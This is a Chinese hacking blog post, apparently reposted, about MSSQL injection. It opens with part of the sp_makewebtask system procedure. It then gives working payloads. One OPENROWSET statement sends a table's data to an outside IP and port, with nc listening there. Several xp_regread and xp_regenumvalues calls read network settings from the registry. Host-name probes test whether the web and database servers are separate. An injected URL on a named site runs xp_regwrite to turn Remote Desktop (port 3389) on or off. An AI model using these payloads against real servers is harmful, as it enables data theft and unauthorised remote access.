@url_query  nvarchar(255) = NULL,     
@whentype  tinyint = 1,    -- 1=now, 2=later, 3=every xday   
           -- 4=every n units of time   
@targetdate  int = 0,     -- yyyymmdd as int  
@targettime  int = 0,     -- hhnnss as int  
@dayflags  tinyint = 1,    -- powers of 2 for days of week   
@numunits  tinyint = 1,  
@unittype  tinyint = 1,    -- 1=hours, 2=days, 3=weeks, 4=minutes  
@procname  nvarchar(128) = NULL,  -- name to use when making the  
           -- task and the wrapper/condenser  
           -- stored procs  
@maketask  int = 2,     -- 0=create unencrypted sproc, no task  
           -- 1=encrypted sproc and task  
           -- 2=unencrypted sproc and task  
@rowcnt   int = 0,     -- max no of rows to display  
@tabborder  tinyint = 1,    -- borders around the results table  
@singlerow  tinyint = 0,    -- Single row per page  
@blobfmt  ntext = NULL,    -- Formatting for text and image fields  
@nrowsperpage int = 0,     -- Results displayed in multiple pages of n rows per page  
@datachg  ntext = NULL,    -- Table and column names for a trigger  
[url=https://www.t00ls.net/space-uid-6974.html]@charset[/url]  nvarchar(25) = N'utf-8', -- Universal character set is the default  
@codepage  int = 65001     -- utf-8 (universal) code page is the default  
  
AS  
BEGIN  
  
   DECLARE @suid smallint  
   DECLARE @yearchar nvarchar(4)  
   DECLARE @monthchar nvarchar(2)  
   DECLARE @daychar nvarchar(2)  
   DECLARE @hourchar nvarchar(2)  
   DECLARE @minchar nvarchar(2)  
   DECLARE @secchar nvarchar(2)  
   DECLARE @currdate datetime  
   DECLARE  @retval int  
  
  
-- Check for valid @dbname if supplied  
   IF (@dbname is NOT NULL)  
      IF (NOT(exists(SELECT * FROM master..sysdatabases WHERE name = @dbname)))  
      BEGIN  
   RAISERROR(16854,11,1)  
         RETURN (9)  
      END  
  
-- Make sure that it's the SA executing this.  
   IF ( NOT ( is_srvrolemember('sysadmin') = 1 ) )  
   BEGIN  
      RAISERROR( 15003, -1, -1, 'sysadmin' )  
      RETURN(1)   
   END  
  
-- IF not supplied, determine the user executing this procedure  
   IF (@username is NULL)  
   BEGIN  
       SET @username = suser_sname()  
  
       IF ( (charindex ('\',@username) > 0) OR (@username is NULL) OR (@username = 'sa') )  
       BEGIN  
           SELECT @username = N'dbo'  
       END  
   END  
  
-- If not supplied, determine the database currently active  
   IF (@dbname is NULL)  
   BEGIN  
   SELECT @dbname = d.name FROM  
    master..sysdatabases d, master..sysprocesses p  
    WHERE d.dbid = p.dbid AND spid = @@spid  
  
   END  
  
-- Generate @procname if not supplied  
   IF (@procname is NULL)  
      BEGIN  
  
         SET @currdate = getdate()  
  
   SET @yearchar = convert(nvarchar(4),year(@currdate))  
         SET @monthchar = right('0'+ rtrim(convert(nvarchar(2),month(@currdate))),2)  
         SET @daychar = right('0'+rtrim(convert(nvarchar(2),day(@currdate))),2)  
         SET @hourchar = right('0'+rtrim(convert(nvarchar(2),datepart(hh,@currdate))),2)  
         SET @minchar = right('0'+rtrim(convert(nvarchar(2),datepart(mi,@currdate))),2)  
         SET @secchar = right('0'+rtrim(convert(nvarchar(2),datepart(ss,@currdate))),2)  
  
   -- Get default procname if not supplied  
         SET @procname = N'web_'+convert(nchar(14),@yearchar+@monthchar+@daychar+@hourchar+@minchar+@secchar)+convert(nvarchar(20),@@spid)+right(rtrim(convert( VARCHAR(25),RAND() )),4)  
  
      END  
  
   SET @retval = 0  
  
-- Create the Web task  
   EXECUTE @retval = sys.xp_makewebtask  @outputfile, @query, @username, @procname, @dbname,  
     @fixedfont, @bold, @italic, @colheaders, @lastupdated, @HTMLheader,  
     @templatefile, @webpagetitle, @resultstitle, @URL, @reftext,  
     @table_urls, @url_query, @whentype, @targetdate, @targettime,  
     @dayflags, @numunits, @unittype, @rowcnt, @maketask, @tabborder,  
     @singlerow, @blobfmt, @nrowsperpage, @datachg, [url=https://www.t00ls.net/space-uid-6974.html]@charset[/url], @codepage  
      
IF (@retval <> 0)  
BEGIN  
     SET @procname = 'xp_makewebtask'  
     RAISERROR(@retval, 11, 1, @procname)  
END  
  
   RETURN @retval  
  
END


其实opendatasource是取数据用的,如果你想得到数据库的IP,根本不需要MSSQL环境就可以得到DATA的IP

用如下语句:
insert into OPENROWSET('SQLOLEDB','uid=test;pwd=test;Network=DBMSSOCN;Address=219.152.120.157,555;', 'select * from dest_table') select * from src_table;--

然后在本机用NC监听8787端口就可以了


另外,用opendatasource取数据的时候要考虑本机带宽等问题!

利用OPENROWSET这个函数也可以拿到数据 并不单单拿到data的IP


关于利用注射点判断数据库web是否分离2009-04-25 13:11来自:皇子  

   xp/2003系统下注册表里有个键值可以得到真实的ip地址
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\{FBD72F8D-6334-4739-957A-7D324D9C27EF}\Parameters\Tcpip
,在注册表的窗口右边就可发现“IPAddress”、“DefaultGateway”、“SubnetMask”等键值,它们分别对应本机当前配置的IP地址、网关及子网掩码等信息
我们用opendatasource反弹出来的ip始终都是公网ip
即使得到的数据库ip和webip一样   也不能断定数据库web不分离
我可以先建立一个表,把注册表里的真实ip写进去,然后如果是个公网ip而且和反弹结果一样 则断定是数据库web不分离 如果是个内网ip 则观望状态。
具体代码:
insert ku exec master..xp_instance_regenumkeys 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\' 
把网卡id写进表ku 中,然后用各种手法读出来,
exec master..xp_regenumvalues 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\{4733C3BB-EC77-4AB4-A6EA-02DB07FD7CFD}\Parameters\Tcpip'                  
看看tcpip项下有几个小项

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\{4733C3BB-EC77-4AB4-A6EA-02DB07FD7CFD}\Parameters\Tcpip','ipaddress'

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\{4733C3BB-EC77-4AB4-A6EA-02DB07FD7CFD}\Parameters\Tcpip','DefaultGateway'
然后读出每个属性,就知道ip网关了

但是实际操作的时候其实有很多问题,除了xp_regread,上面2个存储过程都是要求sa来调用的,这下还不如直接直接命令然后看结果来的方便简单了,不过难得研究出来了就放这吧,有点鸡肋了.
幸好200(sql2005_inj的作者)给予了一个方案,可以更简洁:
select host_name();得到客户端主机名
select @@servername;得到服务端主机名 
暴错时 and host_name()>0--
不暴时配合union all select
或者全部opdatasource反弹回来,查看结果一样就是不分离,不一样的话就是分离 

开启3389的SQL语句: 
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;-- 


关闭3389的SQL语句: 
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;


评论

热度(4)

  1. 昔日_____红丶人べ 转载了此文字
  2. _____红丶人べ404网安 转载了此文字
  3. _____红丶人べ404网安 转载了此文字
  4. crazyuncle404网安 转载了此文字